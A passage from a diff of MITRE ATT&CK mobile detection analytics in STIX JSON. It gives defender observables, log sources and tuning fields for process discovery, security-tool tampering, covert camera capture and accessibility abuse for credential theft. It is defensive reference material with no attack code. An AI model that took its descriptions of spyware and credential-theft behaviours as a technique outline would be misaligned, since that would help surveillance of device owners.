+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-03-10 23:16:21.386000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--5c5225c4-2d35-431e-830d-ea1cc649c6ba",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0692#AN1804",
+                            "external_id": "AN1804"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1804",
+                    "description": "Defender observes an app/package attempting to enumerate running processes by triggering restricted process visibility mechanisms (e.g., repeated queries for running tasks/services, rapid iteration over process identifiers, or access attempts against /proc entries) that are atypical for its declared function and occur without an associated user-facing diagnostic workflow. The detection relies on correlating (1) OS/API calls or shell/system utility execution indicative of process listing or /proc traversal, (2) app privilege context (root, debug build, device owner/profile owner, accessibility/IME status), (3) background execution state, and (4) optional follow-on behaviors consistent with automated discovery (short bursts of local IPC probes, network beacons immediately after enumeration, or rapid targeting of specific high-value package/process names). The analytic should describe what is observable: repeated enumeration signals + privilege context + timing relationship, not the adversary\u2019s intent.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "android:logcat",
+                            "channel": "unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                            "name": "auditd:SYSCALL",
+                            "channel": "attempts to read /proc/* entries at scale (openat/getdents64/readlink) or access denied for /proc traversal; correlate to app UID"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Correlation window for enumeration \u2192 follow-on activity (e.g., 60\u2013600s)."
+                        },
+                        {
+                            "field": "MinEnumerationSignals",
+                            "description": "Minimum count of process enumeration indicators to alert (tune by OS build and telemetry quality)."
+                        },
+                        {
+                            "field": "ProcTraversalThreshold",
+                            "description": "How many distinct /proc paths opened within the window counts as enumeration (e.g., \u226550)."
+                        },
+                        {
+                            "field": "BackgroundOnly",
+                            "description": "If true, require background state to reduce legitimate in-app diagnostics noise."
+                        },
+                        {
+                            "field": "AllowlistedPackages",
+                            "description": "Legitimate security/diagnostic/MDM agents expected to inspect processes."
+                        },
+                        {
+                            "field": "HighValueProcessNames",
+                            "description": "Process/package names of interest (e.g., security agents, banking apps) used only as enrichment, not a signature."
+                        },
+                        {
+                            "field": "NetworkProbePorts",
+                            "description": "Ports considered a \u2018probe/beacon\u2019 after enumeration (53/80/443/etc.)."
+                        },
+                        {
+                            "field": "PrivilegeEscalationGate",
+                            "description": "If true, increase severity when enumeration co-occurs with root/debuggable/jailbreak-like posture."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-02-23 16:59:44.335000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--5d07c07e-4cde-41b9-a03e-94be43ca9bb8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0692#AN1805",
+                            "external_id": "AN1805"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1805",
+                    "description": "Defender observes signals consistent with attempted process listing on iOS where modern OS protections generally prevent broad process enumeration for non-root apps. Detections therefore focus on: (1) feasibility gating via integrity/jailbreak posture, and (2) observable security/log anomalies consistent with attempts to query process tables or restricted system interfaces (e.g., repeated sandbox denials, suspicious sysctl-like access attempts, or abnormal use of private frameworks). Correlate integrity compromise indicators with repeated restricted-access events and optional follow-on behaviors (rapid targeting of specific bundles/services or immediate network beacons) to raise confidence that process discovery is occurring.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                            "name": "MDM:DeviceIntegrity",
+                            "channel": "jailbreak/root compromise indicators or integrity attestation failures enabling process visibility"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "iOS:unifiedlog",
+                            "channel": "repeated sandbox denials related to restricted process/system interfaces consistent with process-table querying attempts"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "iOS:unifiedlog",
+                            "channel": "security-relevant kernel log messages indicating restricted system interface access attempts by app process (device-dependent visibility)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "IntegritySignalRequired",
+                            "description": "If true, alert only when integrity/jailbreak posture indicates process discovery is feasible."
+                        },
+                        {
+                            "field": "MinSandboxDenials",
+                            "description": "Threshold for sandbox denials within a window to treat as sustained restricted-access attempts."
+                        },
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Correlation window between integrity signals and sandbox/network events (e.g., 1\u201324 hours)."
+                        },
+                        {
+                            "field": "AllowlistedBundles",
+                            "description": "Enterprise monitoring/networking apps that may generate benign sandbox noise."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-02-23 17:10:37.953000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--75eaee42-f7b5-4792-9611-74626bd98838",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0693#AN1806",
+                            "external_id": "AN1806"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1806",
+                    "description": "Correlates (1) application acquisition or use of elevated control paths capable of altering defensive tooling or protected system state, such as device administration, root-enabled modification, or security-setting manipulation, (2) direct changes to security-tool configuration, service state, package state, or protected enforcement settings such as SELinux-relevant files or security-app components, and (3) immediate degradation, suppression, or disappearance of expected security telemetry while the device and initiating application remain active. The defender observes a causal chain where a security control is modified first, then monitoring or protection weakens, and subsequent activity continues under reduced defensive visibility.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "device posture changes to rooted, non-compliant, weakened security state, or elevated control role becomes active before security-tool degradation"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "security-relevant application package state, enabled status, administrator state, or managed protection setting changes immediately before monitoring degradation"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application modifies protected configuration, local control files, security settings, or tool-related data immediately before security service degradation or non-reporting state"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between security-setting change, tool degradation, and subsequent continued activity"
+                        },
+                        {
+                            "field": "CriticalToolSet",
+                            "description": "Security-relevant applications or components expected to remain enabled and reporting, such as mobile EDR, Play Protect-associated controls, or agent services"
+                        },
+                        {
+                            "field": "TelemetryGapThreshold",
+                            "description": "Duration or volume threshold defining abnormal loss of expected security telemetry"
+                        },
+                        {
+                            "field": "ProtectedSettingSet",
+                            "description": "Protected settings or files treated as suspicious if modified, including SELinux-relevant enforcement state or security-app configuration"
+                        },
+                        {
+                            "field": "AllowedAdminApps",
+                            "description": "Legitimate applications or management agents allowed to modify security-relevant posture"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Outbound traffic threshold used to confirm continued meaningful activity during reduced defensive visibility"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-04-24 20:30:26.476000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--09ea8707-d76c-44ae-b077-19a8949faa90",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.375000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0694#AN1807",
+                            "external_id": "AN1807"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1807",
+                    "description": "Correlates (1) abnormal application or system resource resolution behavior (e.g., library loading, path resolution, or intent redirection), (2) execution of code or resources not aligned with the originating application\u2019s package identity or expected runtime context, and (3) follow-on execution or network activity originating from the hijacked flow. The defender observes a causal chain where execution is redirected from an expected code path to an alternate resource or payload, resulting in execution under a trusted context but with untrusted origin.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application launches or executes code where loaded library or component path does not match application package path or expected signing context"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application loads executable or library from external or writable directory (e.g., /sdcard/, app cache) prior to execution"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between abnormal resource loading and execution/network activity"
+                        },
+                        {
+                            "field": "AllowedLibraryPaths",
+                            "description": "Baseline of expected library/resource load paths per application"
+                        },
+                        {
+                            "field": "TrustedSignatureList",
+                            "description": "Trusted signing identities for application components"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Applications allowed to dynamically load code or use external resources"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.375000+00:00\", \"old_value\": \"2026-04-13 15:50:52.912000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--4476a312-d2c9-459e-96a3-53ac0b676c52",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0695#AN1808",
+                            "external_id": "AN1808"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1808",
+                    "description": "The defender correlates Android camera access by an app identity with app and device context showing that the capture is inconsistent with expected user-driven recording behavior. The strongest Android evidence is camera resource access followed by sustained capture duration, video or image artifact creation, buffer or cache growth, and optional outbound transfer, especially when the app is backgrounded, operating as a foreground service without visible user initiation, active while the device is locked, or capturing without recent user interaction. The detection is strengthened when the app is unmanaged, recently granted camera access, or not approved to record video.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Camera sensor access began from app identity and remained active for sustained capture interval in app context not mapped to approved video recording workflow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Camera sensor access occurred while AppState=background, foreground service active without visible user action, or DeviceLockState=locked during capture interval"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before camera session start and no foreground transition occurred during sustained capture interval"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Burst write to media, cache, temp, export, or staging path occurred during or immediately after camera session from same app identity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "App identity performing camera session was unmanaged, recently granted camera permission, or not approved to use camera for video or interval image capture"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window linking camera access, lifecycle context, artifact creation, and optional network transfer."
+                        },
+                        {
+                            "field": "CaptureDurationThreshold",
+                            "description": "Minimum sustained camera session duration considered unusual for the app role."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved camera-capable apps vary by organization, device group, and role."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Some apps should only access the camera while visibly foregrounded."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close camera activation must be to user interaction to be considered expected."
+                        },
+                        {
+                            "field": "AllowedBackgroundCaptureApps",
+                            "description": "Specific enterprise or accessibility workflows may legitimately capture while not foregrounded."
+                        },
+                        {
+                            "field": "ArtifactWriteThreshold",
+                            "description": "Minimum media-buffer or file-write volume indicating probable video or burst-image capture."
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Threshold for suspicious outbound transfer after capture."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-03-19 20:20:49.044000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--e6c05bf0-e6d6-46f9-ba38-11b58fbf2f26",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0695#AN1809",
+                            "external_id": "AN1809"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1809",
+                    "description": "The defender correlates managed-app or supervised-device camera access with app and device context showing that the capture is inconsistent with expected user-driven recording behavior. The strongest iOS evidence is camera access or camera-adjacent capture activity followed by app-state evidence such as background or low-interaction operation, optional media artifact creation, and optional post-capture network transfer. Because direct low-level runtime visibility is weaker than Android for many enterprises, the primary iOS analytic should anchor on managed app context, device state, and downstream effects around camera use, with local subsystem telemetry treated as enrichment rather than sole proof.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before app-attributed session using non-standard protocol-to-port pairing"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background activity, low-interaction device state, or DeviceLockState=locked was observed during sustained camera session or immediately before camera access from same bundle context"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Bundle performing camera session was not present in approved managed-app baseline or was not permitted to use camera for video or interval image capture"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window linking camera access, device state, artifact creation, and optional network transfer."
+                        },
+                        {
+                            "field": "CaptureDurationThreshold",
+                            "description": "Minimum sustained camera session duration considered unusual for the bundle role."
+                        },
+                        {
+                            "field": "SupervisedRequired",
+                            "description": "Strongest bundle-baseline and managed-app analytics depend on supervised iOS devices."
+                        },
+                        {
+                            "field": "AllowedManagedApps",
+                            "description": "Approved managed bundle identities with camera capability vary by organization and device profile."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Some managed apps should only access the camera during visible foreground use."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close camera activation must be to user interaction to be considered expected."
+                        },
+                        {
+                            "field": "AllowedBackgroundCaptureApps",
+                            "description": "Specific approved workflows may legitimately capture media under constrained background-like conditions."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-03-23 20:54:34.747000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--7d2231b0-d62e-4d5f-bc26-99e7f14ec741",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0697#AN1812",
+                            "external_id": "AN1812"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1812",
+                    "description": "A defender correlates an application being granted accessibility service control with subsequent consumption of high-volume accessibility events, interaction with sensitive UI elements or text-entry fields, optional overlay/window presentation over other applications, and near-term local buffering or outbound network transmission, indicating abuse of accessibility features for input capture, credential theft, or automated interaction.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application remains backgrounded while accessibility service continues to receive events or perform actions across other foreground apps"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "AllowedAccessibilityApps",
+                            "description": "Allow-list of sanctioned accessibility-enabled apps in the environment, such as screen readers or approved assistive tools."
+                        },
+                        {
+                            "field": "AccessibilityEventRateThreshold",
+                            "description": "Threshold for event volume or sustained event consumption indicating broad UI monitoring rather than limited assistive use."
+                        },
+                        {
+                            "field": "SensitiveFieldCorrelationRequired",
+                            "description": "Determines whether detection should require correlation to text-entry fields, login screens, or password/credential UI contexts."
+                        },
+                        {
+                            "field": "OverlayCorrelationWindow",
+                            "description": "Time window correlating accessibility activity with overlay/window presentation over other apps."
+                        },
+                        {
+                            "field": "AccessibilityToNetworkWindow",
+                            "description": "Time window linking accessibility event capture or text change activity to outbound network communication."
+                        },
+                        {
+                            "field": "BackgroundServiceAllowed",
+                            "description": "Tuning for whether background accessibility service activity is expected for approved assistive tools."
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound byte volume or burst count considered suspicious after accessibility event capture."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-03-06 19:21:56.951000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--89ee35d2-02ec-4c36-b51c-50e686eb3012",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0699#AN1815",
+                            "external_id": "AN1815"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1815",
+                    "description": "Correlates (1) continuous or repeated use of motion or interaction-inference signals that do not require overt user-facing privilege prompts, (2) suppression of higher-risk behavior while user presence or active handling is inferred, and (3) resumption of background execution, sensor use, local data handling, or network activity only when device interaction falls below a threshold. The defender observes a causal chain where an application senses user/device interaction state and intentionally gates malicious behavior to user-inactive periods.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application reduces or halts operational activity during periods of active user interaction and resumes background execution or periodic work only during low-motion or idle intervals"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between motion-state inference and subsequent deferred execution"
+                        },
+                        {
+                            "field": "IdleThreshold",
+                            "description": "Threshold defining when device motion or interaction is considered low enough to permit hidden execution"
+                        },
+                        {
+                            "field": "InteractionSignalSet",
+                            "description": "Environment-specific set of motion or activity signals used to infer user presence"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Baseline of legitimate applications expected to use motion or activity sensing while also conditionally changing behavior"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether suspiciousness increases when deferred activity starts from background or with no recent foreground interaction"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound traffic threshold used to distinguish meaningful deferred operation from benign maintenance traffic"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-04-24 20:30:28.435000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--1f1d8e33-293a-4ceb-a91c-0cf71c6805ea",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0700#AN1816",
+                            "external_id": "AN1816"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1816",
+                    "description": "The defender correlates repeated inbound retrieval and outbound submission activity by the same Android app identity to the same legitimate public web-service class within a short operational window, where the two-way exchange is inconsistent with the app's approved role, interaction model, or background behavior baseline. The strongest Android evidence is app-attributed communication to collaboration, social, cloud storage, code-hosting, messaging, or generic HTTPS platforms where requests that retrieve content are followed by app-attributed posts, uploads, document updates, API writes, or repeated small bidirectional exchanges, especially when they occur while the app is backgrounded, while the device is locked, without recent user interaction, or shortly after local staging or protected-resource access.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
